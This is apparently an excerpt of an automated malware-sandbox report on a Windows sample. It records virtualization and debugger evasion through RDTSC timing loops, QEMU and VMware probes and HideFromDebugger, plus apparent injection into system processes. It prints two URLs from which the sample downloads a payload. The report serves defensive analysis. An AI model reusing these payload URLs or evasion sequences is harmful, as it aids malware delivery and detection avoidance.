      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 0000000000565BED second address: 0000000000565BED instructions:
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 0000000000562BCB second address: 0000000000562BCB instructions:
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 0000000000563C85 second address: 0000000000563F54 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a sub edx, 22E6120Ah 0x00000010 xor edx, 256ED0EBh 0x00000016 cmp ax, 0000EAB4h 0x0000001a cmp dword ptr [esi+24h], edx 0x0000001d mov edx, dword ptr [ebp+00000273h] 0x00000023 je 00007EFE34BDD0C7h 0x00000029 mov ebx, 263052C4h 0x0000002e cmp dx, ax 0x00000031 xor ebx, B0E6794Fh 0x00000037 add ebx, 61B5A210h 0x0000003d pushad 0x0000003e rdtsc
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 0000000000563F54 second address: 0000000000563F54 instructions:
Tries to detect Any.run
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeFile opened: C:\Program Files\qga\qga.exe
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeFile opened: C:\Program Files\qga\qga.exe
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: F63V4i8eZU.exe, 00000000.00000002.316897484.0000000002B80000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
      Source: F63V4i8eZU.exe, 00000000.00000002.316897484.0000000002B80000.00000004.00000001.sdmp, F63V4i8eZU.exe, 00000012.00000002.475431458.00000000006F0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Source: F63V4i8eZU.exe, 00000012.00000002.475431458.00000000006F0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=HTTPS://KINMIRAI.ORG/WP-CONTENT/BIN_QVWER224.BINHTTP://FARMERSSCHOOL.GE/BIN_QVWER224.BINWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 00000000022A0182 second address: 00000000022A0182 instructions:
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 00000000022A6E61 second address: 00000000022A6E61 instructions:
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 00000000022A01B2 second address: 00000000022A01B2 instructions:
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 00000000022A78FC second address: 00000000022A790A instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a pushad 0x0000000b lfence 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 00000000022A790A second address: 00000000022A79F6 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov esi, DCAAA67Fh 0x00000010 test dl, dl 0x00000012 xor esi, F2CCAB26h 0x00000018 test edx, edx 0x0000001a sub esi, 536EBD65h 0x00000020 test bh, ch 0x00000022 xor esi, DAF7BFF4h 0x00000028 test ecx, ecx 0x0000002a test bx, cx 0x0000002d add esi, 00001000h 0x00000033 test bx, ax 0x00000036 cmp cl, dl 0x00000038 cmp bx, dx 0x0000003b mov dword ptr [ebp+000001F8h], FC14852Ch 0x00000045 test ebx, ecx 0x00000047 xor dword ptr [ebp+000001F8h], 83A94D75h 0x00000051 xor dword ptr [ebp+000001F8h], AA3F6E81h 0x0000005b cmp ah, 00000015h 0x0000005e sub dword ptr [ebp+000001F8h], D581B6D8h 0x00000068 cmp esi, dword ptr [ebp+000001F8h] 0x0000006e je 00007EFE34D2B83Ah 0x00000074 mov dword ptr [ebp+00000204h], 67BCF0E4h 0x0000007e xor dword ptr [ebp+00000204h], E457B680h 0x00000088 xor dword ptr [ebp+00000204h], E04C2F31h 0x00000092 xor dword ptr [ebp+00000204h], 1C589955h 0x0000009c cmp ch, dh 0x0000009e cmp esi, dword ptr [ebp+00000204h] 0x000000a4 je 00007EFE34D2B804h 0x000000aa test cl, dl 0x000000ac mov dword ptr [ebp+00000246h], eax 0x000000b2 mov eax, 03147A97h 0x000000b7 cmp ecx, ecx 0x000000b9 xor eax, 4F08C75Bh 0x000000be cmp cl, al 0x000000c0 sub eax, 1A91E3C1h 0x000000c5 sub eax, 318ADA0Bh 0x000000ca push eax 0x000000cb mov eax, dword ptr [ebp+00000246h] 0x000000d1 cmp bh, ah 0x000000d3 push 25819736h 0x000000d8 sub dword ptr [esp], 3CB652F7h 0x000000df xor dword ptr [esp], 3AF83707h 0x000000e6 pushad 0x000000e7 mov ebx, 000000DBh 0x000000ec rdtsc
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 00000000022A77CE second address: 00000000022A77CE instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 13311C4Bh 0x00000013 sub eax, 1A8CF406h 0x00000018 add eax, EA75BF22h 0x0000001d sub eax, E319E766h 0x00000022 cpuid 0x00000024 jmp 00007EFE34BDCE6Ah 0x00000026 cmp bh, dh 0x00000028 bt ecx, 1Fh 0x0000002c jc 00007EFE34BDD441h 0x00000032 test dh, dh 0x00000034 popad 0x00000035 cmp cx, bx 0x00000038 call 00007EFE34BDCF8Bh 0x0000003d lfence 0x00000040 rdtsc
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 00000000022A83B5 second address: 00000000022A83B5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp byte ptr [ebx], al 0x0000000c mov eax, dword ptr [ebp+0000025Ch] 0x00000012 jne 00007EFE34D2B3ABh 0x00000014 mov dword ptr [ebp+0000022Eh], esi 0x0000001a mov esi, AFB1434Bh 0x0000001f test bl, bl 0x00000021 cmp cl, bl 0x00000023 add esi, 0257D909h 0x00000029 add esi, 650EE949h 0x0000002f xor esi, 1718259Dh 0x00000035 clc 0x00000036 cmp ecx, esi 0x00000038 mov esi, dword ptr [ebp+0000022Eh] 0x0000003e jne 00007EFE34D2B117h 0x00000044 cmp bx, FDCDh 0x00000049 inc ecx 0x0000004a inc ebx 0x0000004b cmp ah, bh 0x0000004d mov dword ptr [ebp+0000018Bh], ecx 0x00000053 mov ecx, dword ptr [ebx] 0x00000055 cmp ecx, 9090C350h 0x0000005b mov ecx, dword ptr [ebp+0000018Bh] 0x00000061 jne 00007EFE34D2B3A6h 0x00000063 mov dword ptr [ebp+00000243h], ecx 0x00000069 mov ecx, edx 0x0000006b cmp ecx, dword ptr [ebx] 0x0000006d mov ecx, dword ptr [ebp+00000243h] 0x00000073 jne 00007EFE34D2B37Ah 0x00000075 mov byte ptr [ebp+000001FBh], cl 0x0000007b test ebx, ebx 0x0000007d mov cl, byte ptr [ebx] 0x0000007f cmp cl, FFFFFFE8h 0x00000082 mov cl, byte ptr [ebp+000001FBh] 0x00000088 jne 00007EFE34D2B467h 0x0000008e mov dword ptr [ebp+0000025Ch], eax 0x00000094 mov eax, 4C6E8F3Eh 0x00000099 sub eax, 0007D298h 0x0000009e xor eax, B23D3242h 0x000000a3 add eax, 01A471D4h 0x000000a8 pushad 0x000000a9 rdtsc
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 00000000022A47EF second address: 00000000022A480D instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 xor ebx, 17707658h 0x00000009 sub ebx, D3E79B27h 0x0000000f push ebx 0x00000010 test ecx, ecx 0x00000012 mov ebx, dword ptr [ebp+000001F3h] 0x00000018 pushad 0x00000019 mov ebx, 000000A4h 0x0000001e rdtsc
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 00000000022A480D second address: 00000000022A4843 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 nop 0x00000004 push A346122Fh 0x00000009 add dword ptr [esp], 1CC77B86h 0x00000010 xor dword ptr [esp], D8053D6Bh 0x00000017 cmp dx, bx 0x0000001a add dword ptr [esp], E7F74F24h 0x00000021 cmp al, cl 0x00000023 mov eax, ebp 0x00000025 add eax, 00000100h 0x0000002a mov dword ptr [eax], 05D9D0D6h 0x00000030 pushad 0x00000031 mov esi, 00000061h 0x00000036 rdtsc
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 000000000056790A second address: 00000000005679F6 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov esi, DCAAA67Fh 0x00000010 test dl, dl 0x00000012 xor esi, F2CCAB26h 0x00000018 test edx, edx 0x0000001a sub esi, 536EBD65h 0x00000020 test bh, ch 0x00000022 xor esi, DAF7BFF4h 0x00000028 test ecx, ecx 0x0000002a test bx, cx 0x0000002d add esi, 00001000h 0x00000033 test bx, ax 0x00000036 cmp cl, dl 0x00000038 cmp bx, dx 0x0000003b mov dword ptr [ebp+000001F8h], FC14852Ch 0x00000045 test ebx, ecx 0x00000047 xor dword ptr [ebp+000001F8h], 83A94D75h 0x00000051 xor dword ptr [ebp+000001F8h], AA3F6E81h 0x0000005b cmp ah, 00000015h 0x0000005e sub dword ptr [ebp+000001F8h], D581B6D8h 0x00000068 cmp esi, dword ptr [ebp+000001F8h] 0x0000006e je 00007EFE34BDD30Ah 0x00000074 mov dword ptr [ebp+00000204h], 67BCF0E4h 0x0000007e xor dword ptr [ebp+00000204h], E457B680h 0x00000088 xor dword ptr [ebp+00000204h], E04C2F31h 0x00000092 xor dword ptr [ebp+00000204h], 1C589955h 0x0000009c cmp ch, dh 0x0000009e cmp esi, dword ptr [ebp+00000204h] 0x000000a4 je 00007EFE34BDD2D4h 0x000000aa test cl, dl 0x000000ac mov dword ptr [ebp+00000246h], eax 0x000000b2 mov eax, 03147A97h 0x000000b7 cmp ecx, ecx 0x000000b9 xor eax, 4F08C75Bh 0x000000be cmp cl, al 0x000000c0 sub eax, 1A91E3C1h 0x000000c5 sub eax, 318ADA0Bh 0x000000ca push eax 0x000000cb mov eax, dword ptr [ebp+00000246h] 0x000000d1 cmp bh, ah 0x000000d3 push 25819736h 0x000000d8 sub dword ptr [esp], 3CB652F7h 0x000000df xor dword ptr [esp], 3AF83707h 0x000000e6 pushad 0x000000e7 mov ebx, 000000DBh 0x000000ec rdtsc
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 00000000005677CE second address: 00000000005677CE instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 13311C4Bh 0x00000013 sub eax, 1A8CF406h 0x00000018 add eax, EA75BF22h 0x0000001d sub eax, E319E766h 0x00000022 cpuid 0x00000024 jmp 00007EFE34D2B39Ah 0x00000026 cmp bh, dh 0x00000028 bt ecx, 1Fh 0x0000002c jc 00007EFE34D2B971h 0x00000032 test dh, dh 0x00000034 popad 0x00000035 cmp cx, bx 0x00000038 call 00007EFE34D2B4BBh 0x0000003d lfence 0x00000040 rdtsc
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 0000000000566C24 second address: 0000000000566C24 instructions:
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 0000000000565B7B second address: 0000000000565BB6 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp edx, ebx 0x0000000c test eax, eax 0x0000000e je 00007EFE34D2B700h 0x00000014 pushad 0x00000015 mov dl, 95h 0x00000017 cmp dl, FFFFFF95h 0x0000001a jne 00007EFE34D2EAEFh 0x00000020 popad 0x00000021 mov dword ptr [ebp+000000E8h], eax 0x00000027 fnop 0x00000029 test bh, ch 0x0000002b mov eax, ebp 0x0000002d add eax, 00000100h 0x00000032 test ecx, edx 0x00000034 mov dword ptr [eax], 4FD2ADFDh 0x0000003a pushad 0x0000003b rdtsc
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 0000000000565BB6 second address: 0000000000565BED instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp edx, ebx 0x0000000c add dword ptr [eax], B8DD5D9Fh 0x00000012 pushad 0x00000013 mov dl, 11h 0x00000015 cmp dl, 00000011h 0x00000018 jne 00007EFE34BE0586h 0x0000001e popad 0x0000001f sub dword ptr [eax], 2B06605Eh 0x00000025 xor dword ptr [eax], DDA9ACEEh 0x0000002b fnop 0x0000002d test bh, ch 0x0000002f push 8402AFE5h 0x00000034 test ecx, edx 0x00000036 pushad 0x00000037 rdtsc
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 0000000000565BED second address: 0000000000565BED instructions:
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 0000000000562B1D second address: 0000000000562B73 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 sub dword ptr [esp], E6F9D83Bh 0x0000000a test ch, dh 0x0000000c xor dword ptr [esp], A6CD49A4h 0x00000013 cmp cx, cx 0x00000016 mov eax, dword ptr [ebp+20h] 0x00000019 add eax, ebx 0x0000001b mov dword ptr [ebp+000001F5h], ecx 0x00000021 mov ecx, eax 0x00000023 push ecx 0x00000024 mov ecx, dword ptr [ebp+000001F5h] 0x0000002a pushad 0x0000002b mov ah, 76h 0x0000002d cmp ah, 00000076h 0x00000030 jne 00007EFE34BDE24Fh 0x00000036 popad 0x00000037 cmp ah, bh 0x00000039 mov dword ptr [ebp+0000027Ah], ebx 0x0000003f test edx, ecx 0x00000041 mov ebx, esi 0x00000043 push ebx 0x00000044 test esi, 05CEFCD7h 0x0000004a mov ebx, dword ptr [ebp+0000027Ah] 0x00000050 pushad 0x00000051 mov ebx, 000000D7h 0x00000056 rdtsc
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 0000000000562BCB second address: 0000000000562BCB instructions:
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 0000000000563C85 second address: 0000000000563F54 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a sub edx, 22E6120Ah 0x00000010 xor edx, 256ED0EBh 0x00000016 cmp ax, 0000EAB4h 0x0000001a cmp dword ptr [esi+24h], edx 0x0000001d mov edx, dword ptr [ebp+00000273h] 0x00000023 je 00007EFE34BDD0C7h 0x00000029 mov ebx, 263052C4h 0x0000002e cmp dx, ax 0x00000031 xor ebx, B0E6794Fh 0x00000037 add ebx, 61B5A210h 0x0000003d pushad 0x0000003e rdtsc
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 0000000000563F54 second address: 0000000000563F54 instructions:
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000000C298E4 second address: 0000000000C298EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000000C29B4E second address: 0000000000C29B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A5852 rdtsc
      Source: C:\Windows\explorer.exe TID: 5236Thread sleep count: 146 > 30
      Source: C:\Windows\explorer.exe TID: 5236Thread sleep time: -292000s >= -30000s
      Source: C:\Windows\SysWOW64\chkdsk.exe TID: 1156Thread sleep count: 67 > 30
      Source: C:\Windows\SysWOW64\chkdsk.exe TID: 1156Thread sleep time: -335000s >= -30000s
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: explorer.exe, 0000001D.00000000.447733295.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
      Source: explorer.exe, 0000001D.00000000.447733295.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
      Source: explorer.exe, 0000001D.00000000.446760179.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: explorer.exe, 0000001D.00000000.447365137.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: F63V4i8eZU.exe, 00000000.00000002.316897484.0000000002B80000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
      Source: F63V4i8eZU.exe, 00000012.00000002.475431458.00000000006F0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeMsi.dllPublishershell32advapi32TEMP=https://kinmirai.org/wp-content/bin_QVwEr224.binhttp://farmersschool.ge/bin_QVwEr224.binwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
      Source: explorer.exe, 0000001D.00000000.462940046.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
      Source: explorer.exe, 0000001D.00000000.447733295.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
      Source: explorer.exe, 0000001D.00000000.447733295.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
      Source: explorer.exe, 0000001D.00000000.447868275.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
      Source: explorer.exe, 0000001D.00000000.462987107.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
      Source: explorer.exe, 0000001D.00000000.446760179.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: F63V4i8eZU.exe, 00000000.00000002.316897484.0000000002B80000.00000004.00000001.sdmp, F63V4i8eZU.exe, 00000012.00000002.475431458.00000000006F0000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: explorer.exe, 0000001D.00000000.446760179.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: explorer.exe, 0000001D.00000000.446760179.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeProcess information queried: ProcessInformation

      Anti Debugging:

Hides threads from debuggers
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeThread information set: HideFromDebugger
Potentially malicious time measurement code found
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A5852 Start: 022A4BE7 End: 022A480D
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A045E Start: 022A4BE7 End: 022A480D
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A8DB4 Start: 022A4BE7 End: 022A480D
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A423F Start: 022A4BE7 End: 022A480D
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A4263 Start: 022A4BE7 End: 022A480D
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A4277 Start: 022A4BE7 End: 022A480D
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A5A46 Start: 022A5BED End: 022A480D
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A33A7 Start: 022A4BE7 End: 022A480D
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A4128 Start: 022A4BE7 End: 022A480D
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A513E Start: 022A4BE7 End: 022A480D
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A46E4 Start: 022A4BE7 End: 022A480D
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A1FD9 Start: 022A4BE7 End: 022A480D
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A7CA5 Start: 022A4BE7 End: 022A480D
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A7488 Start: 022A4BE7 End: 022A480D
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeProcess queried: DebugPort
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A5852 rdtsc
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A6320 LdrInitializeThunk,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A5201 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 0_2_022A7365 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 0_2_022A33A7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 0_2_022A33EC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 0_2_022A28E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 0_2_022A7EFC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 0_2_022A348A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 0_2_022A6D92 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E47AE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E47AE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E47EA55 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E444257 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3F4A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3F4A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3BE620 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3D3A1C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3EA61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3EA61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E46B260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E46B260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E488A62 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3B5210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3B5210 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3B5210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3B5210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3BAA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3BAA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3C8A0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3BC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3BC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3BC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3E8E00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3F927A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3DAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3DAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3DAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3DAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3DAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E471608 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3C766D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E46FE3F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3B9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3B9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3B9240 mov eax, dword ptr fs:[00000030h]
